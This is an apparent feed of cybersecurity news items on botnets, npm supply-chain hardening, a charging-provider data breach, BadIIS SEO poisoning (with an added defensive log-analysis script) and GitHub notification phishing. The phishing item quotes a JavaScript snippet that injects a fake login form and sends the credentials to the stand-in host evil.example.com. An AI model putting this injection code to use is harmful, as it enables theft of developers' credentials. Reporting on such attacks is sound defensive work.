-
Cybersecurity researchers have disclosed details of a new botnet that customers can rent access to conduct distributed denial-of-service (DDoS) attacks against targets of interest. The ShadowV2 botnet, according to Darktrace, predominantly targets misconfigured Docker containers on Amazon Web Services (AWS) cloud servers to deploy a Go-based malware that turns infected systems into attack nodes.
-
Zloader, a sophisticated Zeus-based modular trojan that first emerged in 2015, has undergone a significant transformation from its original banking-focused purpose to become a dangerous tool for initial access and ransomware deployment in corporate environments. Following an almost two-year hiatus, this malware reemerged in September 2023 with substantial enhancements to its obfuscation techniques, domain generation […]
The post Zloader Malware Used as Gateway for Ransomware Deployment in Corporate Networks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
-
Recent high-profile supply-chain attacks have exposed critical weaknesses in package registry security, prompting GitHub to roll out a suite of defenses designed to harden the npm ecosystem.
“GitHub Enhances npm’s security with strict authentication, granular tokens, and trusted publishing” marks the latest milestone in defending open source against account takeovers and malicious post-install payloads.
Account Takeovers and Post-Install Malware
In mid-September 2025, the npm registry was rocked by the Shai-Hulud attack, a self-replicating worm that leveraged compromised maintainer credentials to inject malicious JavaScript into widely used packages.
By embedding post-install scripts that exfiltrated environment variables and API secrets, the worm threatened to create a persistent backdoor across thousands of developer machines.
The attack left indicators of compromise (IoCs) that included obfuscated PowerShell one-liners and rogue script tags used to harvest tokens and credentials.
Over 500 infected modules were unpublished within 24 hours, and npm blocked uploads containing the worm’s IoCs.
This breach underscores how malicious actors exploit weak authentication and overly permissive tokens. Without multi-factor enforcement or scoped tokens, a single stolen classic token can become a foothold for escalating privileges, distributing malware, or pivoting deeper into critical projects.
Security Measures to Prevent Compromise
To counter token abuse and prevent future supply-chain compromise, GitHub is introducing three core measures:
Strict authentication
All npm publish operations will require enforced two-factor authentication (2FA) using FIDO2/WebAuthn. The legacy Time-based One-Time Password (TOTP) method will be deprecated, eliminating vulnerabilities associated with shared seed values or SMS fallback.
Granular tokens
Developers will generate short-lived granular access tokens with scoped permissions (for example, read:packages or publish:package-name) and a maximum lifetime of seven days.
Classic tokens will be deprecated entirely, removing the risk of unlimited-scope credentials persisting indefinitely.
Trusted publishing
Leveraging OpenSSF’s Trusted Publishers specification, maintainers can bind package publication to established identity providers via OIDC.
This eliminates the need to embed API tokens in CI/CD pipelines, reducing exposure during build processes.
Additional measures include disabling token bypass for local publishing, expanding the roster of supported identity providers, and publishing migration guides to integrate these changes seamlessly.
GitHub plans a phased rollout with configurable enforcement windows, allowing organizations to adapt CI workflows and update automation scripts without disruption.
As the open source ecosystem scales, security remains a collective responsibility. By adopting FIDO2-based 2FA, migrating to granular tokens, and embracing trusted publishing, npm maintainers can greatly reduce the attack surface for supply-chain threats.
These enhancements not only protect individual projects but also reinforce the integrity of the software industry’s foundational infrastructure.
The post GitHub Enhances NPM’s Security with Strict Authentication, Granular Tokens, and Trusted Publishing appeared first on Cyber Security News.
-
These fake online speedtest applications prey on users seeking to measure their internet performance, yet they harbor hidden payloads that compromise system integrity and privacy. Much like the previously analyzed Fake Manual Reader and Finder software, these imposters leverage packers, obfuscated JavaScript, and persistence mechanisms to execute arbitrary code and exfiltrate sensitive data. On September […]
The post Beware of Fake Online Speedtest Apps with Hidden JavaScript Code appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
-
A critical vulnerability in SolarWinds Web Help Desk (WHD) could allow attackers to escalate privileges and execute arbitrary code on affected systems. SolarWinds has released Web Help Desk 12.8.7 Hotfix 1 to address CVE-2025-26399, a deserialization flaw in the AjaxProxy component. Administrators are urged to install the hotfix immediately to prevent exploitation and protect management […]
The post SolarWinds Web Help Desk Vulnerability Enables Privilege Escalation appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
-
Digital Charging Solutions GmbH (DCS), a leading provider of white-label charging services for automotive OEMs and fleet operators, has confirmed a data breach affecting a limited number of its customers.
DCS disclosed that unauthorized access to personal data occurred in the course of its customer-support processes. The incident was detected through irregularities in log data and immediately triggered an extensive forensic analysis.
On September 19, 2025, DCS detected anomalies in system logs indicating that a third-party service provider had accessed DCS customer records without valid authorization.
Customers’ Personal Data Exposed
This service provider, authorized for customer support operations, is contractually permitted to view limited customer data but is bound by strict data privacy protocols.
Initial forensic analysis revealed isolated cases where names and email addresses were accessed outside the intended support portal.

Figure: Data Breach Notification

No complete payment data or financial transaction records were stored in these systems, as DCS employs tokenization and point-to-point encryption to segregate billing data from support databases.
Extensive IT-forensic analysis, spearheaded by external cybersecurity experts, is underway. Investigators have preserved volatile memory snapshots and conducted full disk imaging of affected endpoints to trace the intrusion vectors.
Preliminary root-cause analysis suggests insider misuse rather than an external exploit, though log-correlation across security information and event management (SIEM) systems is ongoing to rule out lateral movement or privileged escalation.
Evidence of unauthorized API calls and atypical SSH sessions to the customer-support database was recorded, prompting immediate revocation of all service-provider credentials.
Mitigation
DCS has implemented multiple mitigation measures, including forced rotation of access tokens, implementation of multi-factor authentication (MFA) for all third-party users, and enhanced database auditing via Structured Query Language (SQL) anomaly detection rules.
The company has also integrated a Security Orchestration, Automation, and Response (SOAR) platform to automate threat-hunt playbooks and streamline incident-response workflows.
All affected customers, a single-digit number in total, received direct notifications in compliance with GDPR Article 33, and the relevant Data Protection Authority has been informed.
Customers can continue to charge their EVs without disruption. Billing processes remain fully operational, as the invoicing subsystem is isolated behind a dedicated payment gateway employing Transport Layer Security (TLS) 1.3 encryption.
DCS has recommended that users remain vigilant, update passwords where reused across services, and report any suspicious communications.
The breach underscores the importance of zero-trust architecture and continuous monitoring of third-party risk in the electromobility sector.
The post EV Charging Provider Confirm Data Breach – Customers Personal Data Exposed appeared first on Cyber Security News.
-
A sophisticated cyber campaign, dubbed “Operation Rewrite,” is actively hijacking Microsoft Internet Information Services (IIS) web servers to serve malicious content through a technique known as search engine optimization (SEO) poisoning.
Palo Alto Networks uncovered the operation in March 2025, attributing it with high confidence to a Chinese-speaking threat actor who uses a malicious IIS module known as BadIIS.
The campaign’s primary goal is financial gain by manipulating search engine results to redirect unsuspecting users to unwanted websites, such as gambling and pornography platforms.
The attackers compromise legitimate, high-reputation websites, turning them into unwitting conduits for their malicious activities.
BadIIS Malware and SEO Poisoning
At the heart of this operation is BadIIS, a malicious native module for Microsoft’s IIS web server software. First identified in 2021, these modules integrate directly into the web server’s core processes, granting them high-level privileges.
This deep integration allows the malware to intercept, inspect, and modify all incoming and outgoing web traffic. Attackers leverage this control to inject malicious code, redirect users, and steal sensitive information without being easily detected.
The attackers use BadIIS to conduct SEO poisoning. Instead of building new malicious websites, which are difficult to rank in search engines, they compromise established sites that already have a good reputation.
By injecting popular search keywords into the compromised site’s content, they trick search engines like Google and Bing into ranking the site for a wide range of unrelated queries.
The “Operation Rewrite” campaign unfolds in two distinct phases designed to first deceive search engines and then ensnare human victims.
- The Lure Phase: The attack begins when a search engine crawler (like Googlebot) visits a compromised server. The BadIIS module detects the crawler by inspecting its User-Agent header. It then communicates with a command-and-control (C2) server to fetch keyword-rich, poisoned content. This content is served only to the crawler, causing the search engine to index the legitimate website for popular but irrelevant terms. Analysis shows a specific focus on East and Southeast Asia, with keywords for Vietnamese search engines and terms related to illegal soccer streaming services.
- The Trap Phase: Once the search results are poisoned, the trap is set. When a user clicks on the malicious search result, the BadIIS module identifies them as a human victim by checking the Referer header. Instead of showing the expected webpage, the module contacts the C2 server again to fetch a redirect link to a scam website. The compromised server acts as a reverse proxy, seamlessly sending the victim to the attacker-controlled destination.

Figure: Attack Chain
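The lure/trap split described in the two phases above leaves a recognizable pattern in the web server's own logs, which gives defenders a check that does not depend on finding the module itself. The following JavaScript is an added example written for this page, not code from the article or from Palo Alto Networks: it parses IIS W3C log lines (column order taken from the `#Fields:` directive rather than hard-coded), classifies each request as a search crawler, a visitor referred by a search engine, or a direct visitor, and flags any URI that answers crawlers with 200, answers search-referred visitors with a redirect, and answers direct visitors with 200. The sample log, IP addresses, URIs, and the crawler and referer name lists are constructed for the example.

```javascript
// Added example (not from the article): detector for the BadIIS-style cloaking
// pattern, run over constructed IIS W3C log lines.
// Heuristic: a URI that serves search-engine crawlers a 200, sends visitors who
// arrive from a search engine to a 3xx redirect, but serves direct visitors a
// 200 is behaving like a cloaking reverse proxy and deserves a look.

// Crawler user-agents and search-engine referers (assumed lists; extend per site).
const SEARCH_CRAWLER_UA = /googlebot|bingbot|yandexbot|duckduckbot|baiduspider|coccocbot/i;
const SEARCH_REFERER = /^https?:\/\/(www\.)?(google|bing|yahoo|duckduckgo|coccoc)\./i;

// Parse IIS W3C extended log text. The #Fields: directive names the columns,
// so the parser works for any field selection. IIS writes '-' for empty fields
// and '+' in place of spaces inside fields such as the user-agent.
function parseIisLog(text) {
  let fields = null;
  const rows = [];
  for (const raw of text.split('\n')) {
    const line = raw.trim();
    if (!line) continue;
    if (line.startsWith('#Fields:')) {
      fields = line.slice('#Fields:'.length).trim().split(/\s+/);
      continue;
    }
    if (line.startsWith('#')) continue; // other directives (#Software, #Date, ...)
    if (!fields) throw new Error('log data precedes #Fields: directive');
    const cols = line.split(/\s+/);
    if (cols.length !== fields.length) continue; // skip malformed rows
    const row = {};
    fields.forEach((name, i) => { row[name] = cols[i] === '-' ? '' : cols[i]; });
    rows.push(row);
  }
  return rows;
}

// Which of the three audiences the module distinguishes did this request come from?
function classify(row) {
  if (SEARCH_CRAWLER_UA.test(row['cs(User-Agent)'])) return 'crawler';
  if (SEARCH_REFERER.test(row['cs(Referer)'])) return 'search-visitor';
  return 'direct';
}

// Return the URI stems showing the lure/trap split, with the status codes seen
// for each audience so an analyst can review the evidence.
function findCloakedUris(rows) {
  const byUri = new Map();
  for (const row of rows) {
    const uri = row['cs-uri-stem'];
    if (!byUri.has(uri)) {
      byUri.set(uri, { crawler: new Set(), 'search-visitor': new Set(), direct: new Set() });
    }
    byUri.get(uri)[classify(row)].add(Number(row['sc-status']));
  }
  const findings = [];
  for (const [uri, seen] of byUri) {
    const crawlerOk = [...seen.crawler].some(s => s === 200);
    const visitorRedirected = [...seen['search-visitor']].some(s => s >= 300 && s < 400);
    const directOk = [...seen.direct].some(s => s === 200);
    if (crawlerOk && visitorRedirected && directOk) {
      findings.push({
        uri,
        crawler: [...seen.crawler],
        searchVisitor: [...seen['search-visitor']],
        direct: [...seen.direct],
      });
    }
  }
  return findings;
}

// Constructed sample log (not real traffic): /about/ behaves normally,
// /news/schedule.aspx shows the cloaking pattern.
const SAMPLE_LOG = `
#Software: Microsoft Internet Information Services 10.0
#Fields: date time c-ip cs-method cs-uri-stem cs(User-Agent) cs(Referer) sc-status
2025-03-01 10:00:01 203.0.113.10 GET /about/ Mozilla/5.0+(Windows+NT+10.0) - 200
2025-03-01 10:00:02 203.0.113.10 GET /about/ Mozilla/5.0+(Windows+NT+10.0) https://www.google.com/ 200
2025-03-01 10:00:03 198.51.100.5 GET /about/ Mozilla/5.0+(compatible;+Googlebot/2.1) - 200
2025-03-01 10:01:00 198.51.100.5 GET /news/schedule.aspx Mozilla/5.0+(compatible;+Googlebot/2.1) - 200
2025-03-01 10:02:00 203.0.113.44 GET /news/schedule.aspx Mozilla/5.0+(Windows+NT+10.0) https://www.google.com/search?q=live+stream 302
2025-03-01 10:02:30 203.0.113.45 GET /news/schedule.aspx Mozilla/5.0+(iPhone) https://www.bing.com/search?q=free+football 302
2025-03-01 10:03:00 203.0.113.46 GET /news/schedule.aspx Mozilla/5.0+(Windows+NT+10.0) - 200
`;

function demo() {
  return findCloakedUris(parseIisLog(SAMPLE_LOG));
}

console.log(JSON.stringify(demo(), null, 2));
```

Run against a real log export, the finding list is a triage queue, not a verdict: a site that legitimately geo-redirects search traffic will also trip it, so the next step is to request the flagged URI with a crawler user-agent and with a browser user-agent and compare the two responses.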
Palo Alto Networks has linked this activity cluster, tracked as CL-UNK-1037, to a Chinese-speaking threat group. The name “Operation Rewrite” stems from the Pinyin transliteration “chongxiede” (重写), meaning “rewrite,” which was found as an object name in the malware’s code.

Figure: Rewrite Operation

Further investigation revealed additional linguistic evidence, including code comments written in simplified Chinese characters.
The group’s toolkit is not limited to the native BadIIS module. The investigation uncovered several variants, demonstrating the actor’s adaptability.
These include lightweight ASP.NET page handlers, managed .NET IIS modules, and an all-in-one PHP script, all designed to achieve the same SEO poisoning goals through different technical means.
Researchers noted significant overlaps in infrastructure and code design with a publicly tracked threat cluster known as “Group 9” and tactical similarities to the “DragonRank” campaign, suggesting a connection within a broader ecosystem of threat actors.
The post Hackers Hijacking IIS Servers Using Malicious BadIIS Module to Serve Malicious Content appeared first on Cyber Security News.
-
Cloud environments rely on the Instance Metadata Service (IMDS) to provide virtual machines with temporary credentials and essential configuration data. IMDS allows applications to securely retrieve credentials without embedding secrets in code or configuration files. However, threat actors have found ways to misuse this convenience, turning IMDS into a springboard for stealing credentials, moving laterally, […]
The post Hackers Abuse IMDS Service for Cloud Initial Access appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
-
Open source software powers much of today’s technology, enabling developers around the world to build and share tools, libraries, and applications. However, the same openness that drives innovation also presents serious security challenges. Attackers regularly target package registries like npm to compromise accounts and inject malicious code. In response, GitHub has announced significant updates to […]
The post GitHub Introduces npm Security with Stronger Authentication and Trusted Publishing appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
-
In recent weeks, security researchers have uncovered an elaborate phishing campaign that leverages legitimate GitHub notification mechanisms to deliver malicious content.
Victims receive seemingly authentic repository alerts, complete with real-looking commit messages and collaborator updates. Upon closer inspection, the notification headers reveal altered sender addresses and obfuscated links.
The campaign’s sophistication has allowed it to slip past many email gateways, leading to a surge in compromised credentials among developers and IT staff.
Initial reports emerged when multiple open-source maintainers reported unexpected password resets and unauthorized repository forks. H4x0r.DZ identified the malware variant responsible for intercepting GitHub webhook notifications and appending phishing payloads.
Unlike typical phishing emails, these messages maintain valid DKIM and SPF records by exploiting misconfigurations in third-party GitHub Apps.
Recipients clicking the embedded link are redirected through a chain of URL shorteners before landing on a credential-harvesting page.
Analysis of the phishing emails shows that the malware injects custom HTML forms into the GitHub notification template.
Figure: Notification form (Source – X)

The form's action attribute points to a URL under the attacker's control, while JavaScript code captures the entered credentials and relays them via an AJAX POST request.
Infection Mechanism via Webhook Manipulation
The core infection vector hinges on compromised GitHub Apps with overly broad webhook permissions.
Attackers first identify popular repositories that allow external Apps to subscribe to push events.
By registering a malicious App under a plausible name, they gain event subscriptions and acquire a webhook secret.
The attacker’s server validates incoming JSON payloads using the secret, then modifies the “pusher” field to insert malicious HTML before forwarding the notification to GitHub’s email service.
A simplified version of the injection logic appears below:

```javascript
// Relay-side injection as reported: appends a credential form to the
// notification body before the payload is forwarded on.
function modifyPayload(payload) {
  let template = payload.body;
  const phishingForm = `<form action="https://evil.example.com/collect" method="POST">
  <input name="username" placeholder="User Name"/>
  <input type="password" name="password" placeholder="Password"/>
  <button type="submit">Confirm</button>
</form>`;
  // Insert the form just before the closing </div> of the notification template.
  payload.body = template.replace('</div>', `${phishingForm}</div>`);
  return payload;
}
```

The webhook injection flow diagram traces the end-to-end manipulation of webhook payloads. Once credentials are harvested, attackers can access private repositories, escalate privileges, and deploy further malware.
Detection strategies should focus on monitoring unusual webhook registrations, validating App permission scopes, and inspecting outbound email content for embedded forms.
The post Hackers Abusing GitHub Notifications to Deliver Phishing Emails appeared first on Cyber Security News.